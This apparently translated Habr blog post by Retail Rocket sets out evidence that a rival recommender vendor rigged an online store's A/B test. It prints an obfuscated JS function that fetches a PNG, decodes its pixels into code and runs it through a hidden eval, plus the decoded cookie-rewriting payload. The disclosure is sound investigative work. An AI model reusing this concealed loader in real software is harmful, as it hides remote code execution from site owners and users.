⬆️ ⬇️

Attack on AB test: recipe 'R' + t (101) + 'es46'

AB testing is one of the most powerful and useful product management tools that allows you to evaluate the effectiveness of certain decisions on economic indicators in the Internet business. For five years of work, we have conducted a huge number of AB tests, and therefore we know very well how difficult it is to conduct experiments correctly and which errors are repeated all the time.



A few months ago, one of our competitors began to do a strange thing - to offer our customers a comparison of their recommendation system with Retail Rocket through AB tests in the wager format with the obligation to pay 100,000 rubles in case of loss.



Such stories are not uncommon for us - during the existence of the company, our system was compared to almost all existing recommender systems in Russia and abroad, and we always showed excellent results (we did not lose in performance in any test).

')

The first test with Rees was not long in coming, but in the course of its implementation, we were faced with rather strange results, which resulted in serious research. What we found in the end surprised us so much that we want to share the details of this study and bring its results to the court of the IT community and the e-commerce industry in Russia.







AB testing of recommendation systems in the online store “Daughters & Sons”



For several months, the Internet shop “Daughters & Sons” tested three recommender systems: Retail Rocket, Rees, and the company's internal system.



The mechanics of conducting AB testing: the entire audience of the site is randomly divided into three equal parts, and each part of the audience sees its own version of the site. Only the blocks of personal recommendations change - each segment shows blocks managed by one of the recommendation systems:







The test measures the conversion of each traffic segment, compares it with the others, and decides on the basis of which system works more efficiently.



The audience is divided into a client using JavaScript code, all users get the ID of one of the three test segments, which is stored in the cookie and then transmitted to Google Analytics for each significant action on the site.



Test results at the time of writing an article from Google Analytics - conversion by segment



Segment A - recommendation system Daughters Sons

Segment B - Rees recommendation system

Segment C - Retail Rocket recommendation system







Changes in conversion relative to indicators of the internal recommendation system of "Daughters & Sons"



According to this data, segment C (Retail Rocket) loses, segment B (Rees) wins. Separately, pay attention on May 27, on this day Retail Rocket shows the best performance - we will return to this detail later.



During the test, the Retail Rocket engineering team conducted many internal tests, revealed several errors on the site, corrected many integration problems, and conducted a set of internal tests of various algorithms and their variations. All these actions did not bring any noticeable changes.



Visual assessment of the quality of recommendations



In Retail Rocket, we have several ways to evaluate the effectiveness and quality of recommendations. The very first of them is the so-called “expert assessment” (subjective visual assessment of “adequacy”).



Let's look at the examples of recommendations generated by the Retail Rocket and Rees systems:







For cat litter, our system recommends carrying for animals and different types of cat food, and the Rees system recommends baby food, tea, and a rectal tube for children.



There are a lot of such examples for fairly visited products (for which statistics are quickly accumulated) (here is one of the reports on visual quality assessment), and despite the fact that expert assessment does not directly affect the numbers, it is a simple and fast way that serves as a certain indicator quality of the work of recommendation systems.



Indirect quality assessment of recommendations



It seemed strange to us that with such a visual component, the figures show a result not in our favor, so we spent a lot of resources on various internal research of the causes.



First of all, we decided to explore an audience that interacts with blocks of product recommendations. When you click the goods in the Rees recommendation blocks, the parameter is added to the URL:







We added a similar parameter to the URL of products from the Retail Rocket recommendation blocks:







And we built GA segments of users who clicked into recommendation blocks:







The first hypothesis was that our system guesses users' preferences worse, recommends less relevant products.



If this is the case, then our blocks should receive less clicks than Rees recommendation blocks, which is refuted by Google Analytics data - we get 2.81 times more widget clicks:







The second hypothesis that we considered: visually good recommendations distract people from buying and reduce conversion. Those. attract their attention, but distract from purchases and do not contribute to sales growth.



In this case, those who clicked into the recommendation blocks of Retail Rocket will be converted worse than those that are clicked into the Rees blocks. But according to Google Analytics, this is not the case, the conversion of those clicked into Retail Rocket blocks is much higher (by 37% for 4 days):







Thus, Retail Rocket recommends user-friendly products much more often, users click on these products more often and recommendations have a positive effect on sales.



If there are no problems with those who interact with the recommendations, and from the visual side the recommendations look relevant, it remains to look at those who do not click on the recommendations.



Online store audience research



Starting to explore this segment of the audience, we noticed two interesting facts:



  1. In the Rees segment, there are several percent more users than in other segments, although the settings of the AB test assume a uniform distribution of the audience between the recommender systems.
  2. In the Rees segment, the audience is more loyal, there are much more visitors who come to the site again.








To check the correctness of the work of splitting the online store into segments, we independently tested the segmenter using the code that the site used: in parallel with the main division, we started the segmentation of the same audience - the error was minimal:





This means that the segmenter is working correctly and errors of several percent cannot be, i.e. Traffic distribution in the framework of the AB-test “Daughters & Sons” contains an anomaly.



Our developers studied the site code in detail for JS errors and bugs that could affect the segmentation, and did not find anything that could cause an anomaly.



The logical assumption was the idea that users could somehow move between segments. In our practice, there were cases when users changed the segment inside the test, for example, because of an incorrectly set cookie lifetime (in one of the cook stores where the identifier of the AB-test segment was stored, it lived only for two weeks, and if the user returned after this time, he was assigned a random value - ie, the user could get into another segment of the test). To avoid such situations, we have developed a checklist, in which there is a clause on the need to ensure that the user does not change the segment during the test.



To track such situations, Google Analytics has a “Sequence” tool that allows you to select users who were first in one segment and then moved to another. For the analysis, we built several such segments in Google Analytics:







And as a result we received the following figures:







From these data it is clearly seen that anomalously many users move from the rest to the Rees segment. And this is definitely not a bug, otherwise users would move between all segments evenly.



The second conclusion: these users make many orders.



* Online store confirmed that these are real orders (almost all of them have the status of "purchased")



By order numbers of users moved to the Rees segment, we examined our internal session logs and identified the following patterns:



  1. Almost all users moved to the Rees segment have goods added to the cart (i.e. this is a more loyal / conversion audience);
  2. User movements are unevenly distributed across the clock, indicating that it is manually initiated;
  3. Moving users to the Rees segment occurs on those days when Retail Rocket begins to win in the AB test:






Moving users to the Rees segment (clock top, days left)







Moving users to the Retail Rocket segment (top clock, days left)



The table shows that on May 25 and 26 there are almost no movements, and on May 27, when the Retail Rocket system starts to go into a plus, the movements start again. And again, users are moving, who add goods to the cart and will soon be converted into buyers.



Examination of the code that works on the site



Since the movement of loyal users to the Rees semen looked suspicious, we began to look for the reason for changing the user segment and examine the code. We carefully investigated who and how works with the cookies, couldn’t anyone accidentally do something to make such mistakes, and we didn’t find anything suspicious.



There were two options: either the cookie is changed by the server of the Daughters Son's store and this is not visible on the client, or by the dynamic code that comes from the server upon some request.



Checking the dynamic code, we were looking for, among other things, the eval function - a special javascript function that can execute any text, for example, sent from the server, like JavaScript code, which in unfair hands can hide the functionality of the code, but at the same time gives full access to the whole environment site.



During the test, we came across a strange piece of code in the JS Rees library:





A piece of code from the Rees JS library
key: "markDMP", value: function(e) { var t = function(e) { return String.fromCharCode(e) }; if (e) for (var i in e) if (e.hasOwnProperty(i)) if (function(e) { return /\x61\x70\x69\x2E\x72\x65\x65\x73\x34\x36\x2E\x63\x6F\x6D/.test(e) }(e[i])) { var n = function() { var n = document.createElement("canvas") , o = void 0 , s = t(67) , a = t(68) , u = l.default.get(s.toLowerCase() + "ity") || l.default.get(t(71) + "EO_" + a + "ELIVERY_" + s + "ITY_I" + a) , c = [s + "UR", s + "ITY", s + "ODE"]; if (n && n.getContext && u && !1 === g.default.isDebug()) { if (/^a:/.test(u)) { var h = r.unserialize(u); if (!h || 464 === h[c.join("_")]) return "continue" } else if (3784 === u || 3577 === u) return "continue"; o = new Image, o.crossOrigin = "use-credentials", o.onload = function(e, r) { r.width = this.naturalWidth, r.height = this.naturalHeight; var i = r.getContext("2d"); i.drawImage(this, 0, 0); var n = i.getImageData(0, 0, this.naturalWidth, this.naturalHeight) , o = n.data , s = void 0 , a = void 0 , u = ""; for (s = 0, a = o.length; s < a; s++) if (!(s % 4 == 3 && s > 0)) { if (0 === o[s]) break; u += function(e) { return String.fromCharCode(~-e) }(o[s]) } try { window[t(101) + "val"](u) } catch (e) {} } .bind(o, t, n), o.src = e[i] } }(); if ("continue" === n) continue } else { var o = document.createElement("img"); o.src = e[i], o.style.width = 0, o.style.height = 0, o.style.display = "none", o.style.position = "absolute", o.style.left = "-9999px", document.body.appendChild(o) } } } 








All code is available by reference . The peculiarity of this piece of code is that it is clearly trying to hide its functionality.



Several conclusions can be drawn from the code:











We assume that once this information is published, Rees will delete this code, so we saved it using two external independent services: https://web.archive.org and https://www.runscope.com



Its formatted version is available for research by reference .



To understand what exactly this fragment does, we wrote a module that emulates user actions and logs all requests towards the Rees server. On May 25 and 26, nothing happened (this is also seen from the table with data on the hourly movement of users towards Rees), and on May 27, when, according to Google Analytics, the Retail Rocket system went out on the AB test, around 7 pm Moscow time began moving users to the Rees segment.







Moving users to the Rees segment (clock top, days left)



At the same time, we fixed requests towards the Rees server for a picture in PNG format (the contents of the picture can be viewed at the link ). Just like that, the picture is not available (error 404 is returned), but when the request is sent to the picture of the session of the user Rees, the picture is available for download:







If we transfer the image to the code input that the code was attempted to encode / hide, for convenience we rendered it separately , we get the following JS, which changes the value of the cookie, where the user segment of the AB test is stored:



 document.cookie="rr-VisitorSegment_Rec=3:2; domain=.dochkisinochki.ru; path=/; expires=Mon, 25 Sep 2017 10:15:20 +0000";document.cookie="DS_SM_rrSegmentRecommendedABC=B; domain=.dochkisinochki.ru; path=/ 


This code explicitly changes the two cookies belonging to the store, in which the user's segment is stored, to the value of a segment equal to the Rees segment.



We are sure that Rees will hide all traces of this attack, so the image is also saved by a request from an independent third-party service .



Thus, the code of the system Rees moves to its segment of users who have added the product to the cart and are about to make an order.



According to the data received since the beginning of logging of user movements (May 1–28), built on the basis of the segment initially issued to users (that is, all those who first visited the site before May 1 are excluded from this data), Retail Rocket reliably wins the test, and Rees reduces store sales:







The exact window of migration of loyal online store users to the Rees segment is unknown, so the difference in efficiency is much larger.



In addition, we see signs of other attacks on the test in the Rees code, for example, when they first visit the site, their system performs cookie matches with several RTB networks.



Sync code:







The saved request can be viewed at the link to web.archive.org



Sync requests:







At a minimum, this allows competitors of an online store to gain access to these users, and as a maximum, to retarget traffic from its segment and divert traffic from other segments of the test to a competitor, reducing conversion.



An interesting fact is that this attack of Rees was supported by an active PR campaign in the media and social networks:







Instead of conclusion



For almost 5 years of work, we are faced for the first time with similar behavior. Unfortunately, AB tests can be performed only with absolute certainty about the decency of all its participants.



We consider such methods of competition as unfair and unacceptable, this is detrimental to the entire community and undermines trust in established practices. At the moment we are actively working in the legal field in order to punish the perpetrators and urge the community to share their experience in solving such situations.

Source: https://habr.com/ru/post/330012/



All Articles